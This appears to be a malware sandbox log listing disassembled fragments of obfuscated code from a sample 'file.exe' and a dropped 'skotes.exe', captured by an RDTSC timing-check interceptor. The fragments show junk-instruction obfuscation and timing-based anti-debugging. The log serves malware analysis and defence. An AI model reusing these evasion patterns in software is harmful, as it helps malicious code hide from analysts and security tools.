Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A508CF second address: 4A508DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA67D08029Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A508DE second address: 4A508E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A508E2 second address: 4A50912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b jmp 00007FA67D0802A5h 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA67D08029Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50912 second address: 4A509B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA67C81A871h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 push esi 0x00000012 mov bh, 5Dh 0x00000014 pop esi 0x00000015 mov bx, DA98h 0x00000019 popad 0x0000001a push esp 0x0000001b pushad 0x0000001c mov esi, 5679AF29h 0x00000021 pushfd 0x00000022 jmp 00007FA67C81A876h 0x00000027 xor ecx, 516684F8h 0x0000002d jmp 00007FA67C81A86Bh 0x00000032 popfd 0x00000033 popad 0x00000034 mov dword ptr [esp], esi 0x00000037 pushad 0x00000038 push eax 0x00000039 mov ah, bl 0x0000003b pop esi 0x0000003c mov ax, di 0x0000003f popad 0x00000040 mov esi, dword ptr [ebp+08h] 0x00000043 pushad 0x00000044 call 00007FA67C81A875h 0x00000049 mov ah, 0Eh 0x0000004b pop edi 0x0000004c call 00007FA67C81A86Ah 0x00000051 mov ax, C391h 0x00000055 pop ecx 0x00000056 popad 0x00000057 mov ebx, 00000000h 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A509B8 second address: 4A509C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D08029Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50B26 second address: 4A50B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A875h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FA67C81A86Eh 0x0000000f push dword ptr [ebp+14h] 0x00000012 jmp 00007FA67C81A870h 0x00000017 push dword ptr [ebp+10h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FA67C81A877h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50B7D second address: 4A50B82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60DC4 second address: 4A60DCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60DCA second address: 4A60DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60DD0 second address: 4A60DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60B31 second address: 4A60BA7 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA67D08029Eh 0x00000008 jmp 00007FA67D0802A5h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushfd 0x00000011 jmp 00007FA67D0802A0h 0x00000016 adc eax, 1E36C438h 0x0000001c jmp 00007FA67D08029Bh 0x00000021 popfd 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 mov bx, 6C5Ah 0x00000029 mov cx, di 0x0000002c popad 0x0000002d xchg eax, ebp 0x0000002e jmp 00007FA67D08029Dh 0x00000033 mov ebp, esp 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FA67D08029Dh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60BA7 second address: 4A60BCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA67C81A86Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60BCC second address: 4A60BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60BD2 second address: 4A60BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE0DF2 second address: 4AE0E0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA67D0802A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE0E0A second address: 4AE0E22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A86Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE0E22 second address: 4AE0E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE0E26 second address: 4AE0E2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE0E2C second address: 4AE0E99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D08029Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FA67D0802A1h 0x00000011 and si, A306h 0x00000016 jmp 00007FA67D0802A1h 0x0000001b popfd 0x0000001c mov di, ax 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 mov edi, eax 0x00000024 push ecx 0x00000025 mov ax, bx 0x00000028 pop edi 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c jmp 00007FA67D08029Ah 0x00000031 pop ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FA67D0802A7h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE028A second address: 4AE0299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA67C81A86Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70121 second address: 4A70134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D08029Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70134 second address: 4A7013A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A7013A second address: 4A7013E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A7013E second address: 4A7015F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A86Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA67C81A86Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A7015F second address: 4A70165 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70165 second address: 4A7019B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA67C81A870h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ch, bh 0x00000016 mov eax, 00CFD1B5h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE0492 second address: 4AE0498 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE0498 second address: 4AE04D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 call 00007FA67C81A878h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FA67C81A870h 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE04D0 second address: 4AE053E instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 4D7BEDAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, 3AA3B5CBh 0x0000000e popad 0x0000000f mov ebp, esp 0x00000011 jmp 00007FA67D08029Eh 0x00000016 push dword ptr [ebp+0Ch] 0x00000019 pushad 0x0000001a pushad 0x0000001b call 00007FA67D08029Ch 0x00000020 pop ecx 0x00000021 movsx edi, si 0x00000024 popad 0x00000025 popad 0x00000026 push dword ptr [ebp+08h] 0x00000029 pushad 0x0000002a push eax 0x0000002b call 00007FA67D08029Bh 0x00000030 pop esi 0x00000031 pop edi 0x00000032 call 00007FA67D0802A6h 0x00000037 mov edx, esi 0x00000039 pop ecx 0x0000003a popad 0x0000003b call 00007FA67D080299h 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE053E second address: 4AE0567 instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cx, 4D47h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f call 00007FA67C81A879h 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE0567 second address: 4AE05C1 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA67D0802A1h 0x00000008 and si, 3896h 0x0000000d jmp 00007FA67D0802A1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push esi 0x00000016 pushad 0x00000017 popad 0x00000018 pop edx 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007FA67D0802A4h 0x00000026 pop eax 0x00000027 jmp 00007FA67D08029Bh 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE05C1 second address: 4AE05D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA67C81A874h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE05D9 second address: 4AE05E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE05E9 second address: 4AE05ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE05ED second address: 4AE05F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE05F3 second address: 4AE05F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80623 second address: 4A80629 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80629 second address: 4A806CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA67C81A86Ch 0x00000009 and eax, 737F5338h 0x0000000f jmp 00007FA67C81A86Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a jmp 00007FA67C81A875h 0x0000001f push FFFFFFFEh 0x00000021 pushad 0x00000022 pushad 0x00000023 push esi 0x00000024 pop edi 0x00000025 jmp 00007FA67C81A876h 0x0000002a popad 0x0000002b pushfd 0x0000002c jmp 00007FA67C81A872h 0x00000031 or ax, 4F28h 0x00000036 jmp 00007FA67C81A86Bh 0x0000003b popfd 0x0000003c popad 0x0000003d push 618FCA61h 0x00000042 jmp 00007FA67C81A86Fh 0x00000047 xor dword ptr [esp], 17760A79h 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 mov esi, edi 0x00000053 mov si, bx 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A806CB second address: 4A807BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D0802A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FA67D080299h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FA67D08029Eh 0x00000015 and cx, 9718h 0x0000001a jmp 00007FA67D08029Bh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FA67D0802A8h 0x00000026 jmp 00007FA67D0802A5h 0x0000002b popfd 0x0000002c popad 0x0000002d push eax 0x0000002e jmp 00007FA67D0802A1h 0x00000033 mov eax, dword ptr [esp+04h] 0x00000037 pushad 0x00000038 mov edi, 74A899A2h 0x0000003d pushfd 0x0000003e jmp 00007FA67D0802A3h 0x00000043 jmp 00007FA67D0802A3h 0x00000048 popfd 0x00000049 popad 0x0000004a mov eax, dword ptr [eax] 0x0000004c pushad 0x0000004d mov di, 3E5Ah 0x00000051 mov cx, dx 0x00000054 popad 0x00000055 mov dword ptr [esp+04h], eax 0x00000059 jmp 00007FA67D08029Ch 0x0000005e pop eax 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007FA67D0802A7h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A807BB second address: 4A8089E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA67C81A86Fh 0x00000009 or esi, 5A80660Eh 0x0000000f jmp 00007FA67C81A879h 0x00000014 popfd 0x00000015 push ecx 0x00000016 pop edx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr fs:[00000000h] 0x00000020 jmp 00007FA67C81A86Ah 0x00000025 nop 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FA67C81A86Eh 0x0000002d jmp 00007FA67C81A875h 0x00000032 popfd 0x00000033 call 00007FA67C81A870h 0x00000038 pushfd 0x00000039 jmp 00007FA67C81A872h 0x0000003e add cx, 4948h 0x00000043 jmp 00007FA67C81A86Bh 0x00000048 popfd 0x00000049 pop eax 0x0000004a popad 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f mov esi, edx 0x00000051 pushfd 0x00000052 jmp 00007FA67C81A877h 0x00000057 xor si, 643Eh 0x0000005c jmp 00007FA67C81A879h 0x00000061 popfd 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A8089E second address: 4A808F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA67D0802A7h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FA67D0802A9h 0x0000000f and ecx, 30DA6FD6h 0x00000015 jmp 00007FA67D0802A1h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push ebx 0x00000023 pop ecx 0x00000024 mov bx, 586Ah 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A808F9 second address: 4A8091B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, cl 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 1Ch 0x0000000b pushad 0x0000000c push edx 0x0000000d mov di, si 0x00000010 pop esi 0x00000011 mov ecx, ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ebx, 012E9222h 0x0000001d mov dx, AE6Eh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A8091B second address: 4A8095E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 pushfd 0x00000006 jmp 00007FA67D08029Eh 0x0000000b xor ecx, 48B782B8h 0x00000011 jmp 00007FA67D08029Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp], ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FA67D0802A5h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A8095E second address: 4A80983 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA67C81A86Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80983 second address: 4A809E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA67D0802A7h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov esi, 19BF0931h 0x00000012 pushfd 0x00000013 jmp 00007FA67D08029Eh 0x00000018 sbb cx, D108h 0x0000001d jmp 00007FA67D08029Bh 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 jmp 00007FA67D0802A6h 0x0000002a xchg eax, edi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A809E6 second address: 4A80A03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80A03 second address: 4A80A1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D0802A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80A1F second address: 4A80A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80A23 second address: 4A80A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80A27 second address: 4A80A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80A2D second address: 4A80A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA67D0802A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80A4C second address: 4A80AC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A86Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76FBB370h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FA67C81A874h 0x00000015 and ah, FFFFFFE8h 0x00000018 jmp 00007FA67C81A86Bh 0x0000001d popfd 0x0000001e jmp 00007FA67C81A878h 0x00000023 popad 0x00000024 xor dword ptr [ebp-08h], eax 0x00000027 jmp 00007FA67C81A870h 0x0000002c xor eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FA67C81A86Ch 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80AC1 second address: 4A80AC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80AC7 second address: 4A80ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80ACB second address: 4A80ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80ADA second address: 4A80ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80ADE second address: 4A80AE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80AE4 second address: 4A80B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA67C81A879h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80B01 second address: 4A80B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FA67D08029Dh 0x00000010 lea eax, dword ptr [ebp-10h] 0x00000013 jmp 00007FA67D08029Eh 0x00000018 mov dword ptr fs:[00000000h], eax 0x0000001e pushad 0x0000001f jmp 00007FA67D08029Eh 0x00000024 pushfd 0x00000025 jmp 00007FA67D0802A2h 0x0000002a sbb esi, 174743F8h 0x00000030 jmp 00007FA67D08029Bh 0x00000035 popfd 0x00000036 popad 0x00000037 mov esi, dword ptr [ebp+08h] 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80B6D second address: 4A80B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80B72 second address: 4A80BF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA67D0802A3h 0x00000009 sbb cx, 046Eh 0x0000000e jmp 00007FA67D0802A9h 0x00000013 popfd 0x00000014 movzx esi, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi+10h] 0x0000001d jmp 00007FA67D0802A3h 0x00000022 test eax, eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FA67D08029Bh 0x0000002d sbb ch, 0000002Eh 0x00000030 jmp 00007FA67D0802A9h 0x00000035 popfd 0x00000036 movzx ecx, dx 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80BF6 second address: 4A80C0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A86Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FA6EEC59986h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov edx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80C0F second address: 4A80C41 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA67D0802A8h 0x00000008 adc ax, 7708h 0x0000000d jmp 00007FA67D08029Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80C41 second address: 4A80C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A80145 second address: 4A8014A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BAF2AB second address: BAEBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007FA67C81A866h 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 stc 0x00000014 push dword ptr [ebp+122D01FDh] 0x0000001a or dword ptr [ebp+122D222Ch], eax 0x00000020 call dword ptr [ebp+122D36FCh] 0x00000026 pushad 0x00000027 add dword ptr [ebp+122D2181h], esi 0x0000002d xor eax, eax 0x0000002f jmp 00007FA67C81A86Fh 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 mov dword ptr [ebp+122D2181h], eax 0x0000003e mov dword ptr [ebp+122D3AC0h], eax 0x00000044 jno 00007FA67C81A873h 0x0000004a sub dword ptr [ebp+122D255Fh], ecx 0x00000050 mov esi, 0000003Ch 0x00000055 stc 0x00000056 mov dword ptr [ebp+122D255Fh], edi 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 mov dword ptr [ebp+122D2181h], ecx 0x00000066 lodsw 0x00000068 pushad 0x00000069 sub ax, BFBAh 0x0000006e sbb edx, 54EC89E5h 0x00000074 popad 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 jmp 00007FA67C81A86Ah 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 jnc 00007FA67C81A87Eh 0x00000088 push eax 0x00000089 pushad 0x0000008a push eax 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
